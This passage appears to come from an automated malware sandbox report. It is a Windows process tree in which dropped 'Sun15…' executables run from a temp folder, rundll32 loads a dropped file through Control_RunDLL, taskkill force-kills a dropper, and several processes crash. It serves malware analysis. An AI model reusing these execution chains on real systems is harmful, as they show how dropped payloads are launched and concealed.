                                                                                C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
                                                                                13⤵
                                                                                  PID:4932
                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                    "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
                                                                                    14⤵
                                                                                    • Loads dropped DLL
                                                                                    PID:2772
                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                        taskkill /F -Im "Sun158d8ef840.exe"
                                                                        8⤵
                                                                        • Kills process with taskkill
                                                                        PID:1264
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c Sun152e52d07b74d9b5.exe
                                                                4⤵
                                                                  PID:3180
                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS46E4B883\Sun152e52d07b74d9b5.exe
                                                                    Sun152e52d07b74d9b5.exe
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:5180
                                                                    • C:\Windows\system32\WerFault.exe
                                                                      C:\Windows\system32\WerFault.exe -u -p 5180 -s 1900
                                                                      6⤵
                                                                      • Program crash
                                                                      • Checks processor information in registry
                                                                      • Enumerates system info in registry
                                                                      PID:6076
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c Sun1507db358fce61c0b.exe
                                                                  4⤵
                                                                    PID:4152
                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS46E4B883\Sun1507db358fce61c0b.exe
                                                                      Sun1507db358fce61c0b.exe
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      PID:2980
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2980 -s 284
                                                                        6⤵
                                                                        • Program crash
                                                                        • Checks processor information in registry
                                                                        • Enumerates system info in registry
                                                                        PID:6084
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c Sun152bea652bd7232.exe
                                                                    4⤵
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:3196
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c Sun159ff1acacf.exe
                                                                    4⤵
                                                                      PID:5008
                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS46E4B883\Sun159ff1acacf.exe
                                                                        Sun159ff1acacf.exe
                                                                        5⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetThreadContext
                                                                        PID:932
                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS46E4B883\Sun159ff1acacf.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\7zS46E4B883\Sun159ff1acacf.exe
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          PID:5488
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c Sun15f1b1f8c669.exe
                                                                      4⤵
                                                                      • Suspicious use of WriteProcessMemory
                                                                      PID:1744
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c Sun1577c3e159a3e3815.exe /mixone
                                                                      4⤵
                                                                      • Suspicious use of WriteProcessMemory
                                                                      PID:1000
                                                              • C:\Windows\System32\Upfc.exe
                                                                C:\Windows\System32\Upfc.exe /launchtype periodic /cv o/s9UBSiMEml+PkwTBXeWw.0
                                                                1⤵
                                                                  PID:4000
                                                                • C:\Windows\System32\sihclient.exe
                                                                  C:\Windows\System32\sihclient.exe /cv lX+JvkxKV0GZd+6TsanO5Q.0.2
                                                                  1⤵
                                                                  • Modifies data under HKEY_USERS
                                                                  PID:4712
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                                                                  1⤵
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:5044
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                  1⤵
                                                                    PID:3532
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                    1⤵
                                                                      PID:1788
                                                                    • C:\Windows\ImmersiveControlPanel\SystemSettings.exe
                                                                      "C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
                                                                      1⤵
                                                                      • Drops file in Windows directory
                                                                      • Checks SCSI registry key(s)
                                                                      • Checks processor information in registry
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:1648
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
                                                                      1⤵
                                                                        PID:2096
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc
                                                                        1⤵
                                                                          PID:3188
                                                                        • C:\Windows\System32\oobe\UserOOBEBroker.exe
                                                                          C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
                                                                          1⤵
                                                                          • Drops file in Windows directory
                                                                          PID:5072
                                                                        • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
                                                                          C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
                                                                          1⤵
                                                                            PID:3948
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k DevicesFlow -s DevicesFlowUserSvc
                                                                            1⤵
                                                                              PID:1456
                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS46E4B883\Sun15f1b1f8c669.exe
                                                                              Sun15f1b1f8c669.exe
                                                                              1⤵
                                                                              • Executes dropped EXE
                                                                              PID:1932
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1932 -s 260
                                                                                2⤵
                                                                                • Program crash
                                                                                • Checks processor information in registry
                                                                                • Enumerates system info in registry
                                                                                PID:5988
                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS46E4B883\Sun152bea652bd7232.exe
                                                                              Sun152bea652bd7232.exe
                                                                              1⤵
                                                                              • Executes dropped EXE
                                                                              PID:4700
                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS46E4B883\Sun1577c3e159a3e3815.exe
                                                                              Sun1577c3e159a3e3815.exe /mixone
                                                                              1⤵
                                                                              • Executes dropped EXE
                                                                              PID:4380
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4380 -s 284
                                                                                2⤵
                                                                                • Drops file in Windows directory
                                                                                • Program crash
                                                                                • Checks processor information in registry
                                                                                • Enumerates system info in registry
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:6036
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1932 -ip 1932
                                                                              1⤵
                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                              PID:5856
                                                                            • C:\Windows\system32\WerFault.exe
                                                                              C:\Windows\system32\WerFault.exe -pss -s 420 -p 5180 -ip 5180
                                                                              1⤵
                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                              PID:5904
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4380 -ip 4380
                                                                              1⤵
                                                                                PID:5924
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2980 -ip 2980
                                                                                1⤵
                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                PID:5944
                                                                              • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
                                                                                C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
                                                                                1⤵
                                                                                  PID:2860
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1284 -ip 1284
                                                                                  1⤵
                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                  PID:4836
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
                                                                                  1⤵
                                                                                  • Adds Run key to start application
                                                                                  • Enumerates system info in registry
                                                                                  • Modifies registry class
                                                                                  • NTFS ADS
                                                                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                  • Suspicious use of SendNotifyMessage
                                                                                  PID:6828
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ffcbc5746f8,0x7ffcbc574708,0x7ffcbc574718
                                                                                    2⤵
                                                                                      PID:7028
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,622224574126732029,17464945656498881501,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
                                                                                      2⤵
                                                                                        PID:6140
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,622224574126732029,17464945656498881501,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
                                                                                        2⤵
                                                                                          PID:7156
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2100,622224574126732029,17464945656498881501,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2844 /prefetch:8
                                                                                          2⤵
                                                                                            PID:1468
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,622224574126732029,17464945656498881501,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1
                                                                                            2⤵
                                                                                              PID:6440
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,622224574126732029,17464945656498881501,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1
                                                                                              2⤵
                                                                                                PID:5632
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,622224574126732029,17464945656498881501,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4732 /prefetch:1
                                                                                                2⤵
                                                                                                  PID:3976
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,622224574126732029,17464945656498881501,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5080 /prefetch:1
                                                                                                  2⤵
                                                                                                    PID:6296
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,622224574126732029,17464945656498881501,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4708 /prefetch:1
                                                                                                    2⤵
                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                    PID:5924
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,622224574126732029,17464945656498881501,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
                                                                                                    2⤵
                                                                                                      PID:6820
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,622224574126732029,17464945656498881501,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3520 /prefetch:1
                                                                                                      2⤵
                                                                                                        PID:4924
                                                                                                      • C:\Windows\explorer.exe
                                                                                                        "C:\Windows\explorer.exe" ms-settings:dateandtime
                                                                                                        2⤵
                                                                                                          PID:6640
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,622224574126732029,17464945656498881501,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:1
                                                                                                          2⤵
                                                                                                            PID:4628
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,622224574126732029,17464945656498881501,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3580 /prefetch:8
                                                                                                            2⤵
                                                                                                              PID:5384
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,622224574126732029,17464945656498881501,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3580 /prefetch:8
                                                                                                              2⤵
                                                                                                                PID:5516
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,622224574126732029,17464945656498881501,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5724 /prefetch:1
                                                                                                                2⤵
                                                                                                                  PID:1000
                                                                                                                • C:\Windows\explorer.exe
                                                                                                                  "C:\Windows\explorer.exe" ms-settings:dateandtime
                                                                                                                  2⤵
                                                                                                                    PID:920
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2100,622224574126732029,17464945656498881501,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4524 /prefetch:8
                                                                                                                    2⤵
                                                                                                                      PID:4232
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,622224574126732029,17464945656498881501,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4676 /prefetch:2
                                                                                                                      2⤵
                                                                                                                        PID:3204
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,622224574126732029,17464945656498881501,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4664 /prefetch:1
                                                                                                                        2⤵
                                                                                                                          PID:3096
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,622224574126732029,17464945656498881501,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:1
                                                                                                                          2⤵
                                                                                                                            PID:1912
                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2100,622224574126732029,17464945656498881501,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5960 /prefetch:8
                                                                                                                            2⤵
                                                                                                                              PID:7084
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,622224574126732029,17464945656498881501,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3572 /prefetch:1
                                                                                                                              2⤵
                                                                                                                                PID:5272
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,622224574126732029,17464945656498881501,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4772 /prefetch:1
                                                                                                                                2⤵
                                                                                                                                  PID:3028
                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,622224574126732029,17464945656498881501,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1916 /prefetch:1
                                                                                                                                  2⤵
                                                                                                                                    PID:3504
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2100,622224574126732029,17464945656498881501,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6552 /prefetch:8
                                                                                                                                    2⤵
                                                                                                                                      PID:2432
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,622224574126732029,17464945656498881501,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6656 /prefetch:1
                                                                                                                                      2⤵
                                                                                                                                        PID:5356
                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,622224574126732029,17464945656498881501,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2080 /prefetch:1
                                                                                                                                        2⤵
                                                                                                                                          PID:5192
                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,622224574126732029,17464945656498881501,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6860 /prefetch:1
                                                                                                                                          2⤵
                                                                                                                                            PID:6816
                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,622224574126732029,17464945656498881501,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7056 /prefetch:1
                                                                                                                                            2⤵
                                                                                                                                              PID:6064
                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,622224574126732029,17464945656498881501,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6416 /prefetch:1
                                                                                                                                              2⤵
                                                                                                                                                PID:6760
                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,622224574126732029,17464945656498881501,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6596 /prefetch:1
                                                                                                                                                2⤵
                                                                                                                                                  PID:5024
                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2100,622224574126732029,17464945656498881501,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6584 /prefetch:8
                                                                                                                                                  2⤵
                                                                                                                                                    PID:5224
                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,622224574126732029,17464945656498881501,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6624 /prefetch:1
                                                                                                                                                    2⤵
                                                                                                                                                      PID:6920
                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,622224574126732029,17464945656498881501,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6704 /prefetch:1
                                                                                                                                                      2⤵
                                                                                                                                                        PID:3472
                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2100,622224574126732029,17464945656498881501,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6844 /prefetch:8
                                                                                                                                                        2⤵
                                                                                                                                                          PID:2488
                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2100,622224574126732029,17464945656498881501,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7664 /prefetch:8
                                                                                                                                                          2⤵
                                                                                                                                                          • NTFS ADS
                                                                                                                                                          PID:3116
                                                                                                                                                        • C:\Windows\System32\msiexec.exe
                                                                                                                                                          "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\WindowsPCHealthCheckSetup.msi"
                                                                                                                                                          2⤵
                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                          PID:5376
                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2100,622224574126732029,17464945656498881501,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7000 /prefetch:8
                                                                                                                                                          2⤵
                                                                                                                                                            PID:6216
                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2100,622224574126732029,17464945656498881501,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1788 /prefetch:8
                                                                                                                                                            2⤵
                                                                                                                                                              PID:6248
                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2100,622224574126732029,17464945656498881501,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7148 /prefetch:8
                                                                                                                                                              2⤵
                                                                                                                                                                PID:4344
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5424 -ip 5424
                                                                                                                                                              1⤵
                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                              PID:564
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 180 -p 5548 -ip 5548
                                                                                                                                                              1⤵
                                                                                                                                                                PID:6724
                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
                                                                                                                                                                1⤵
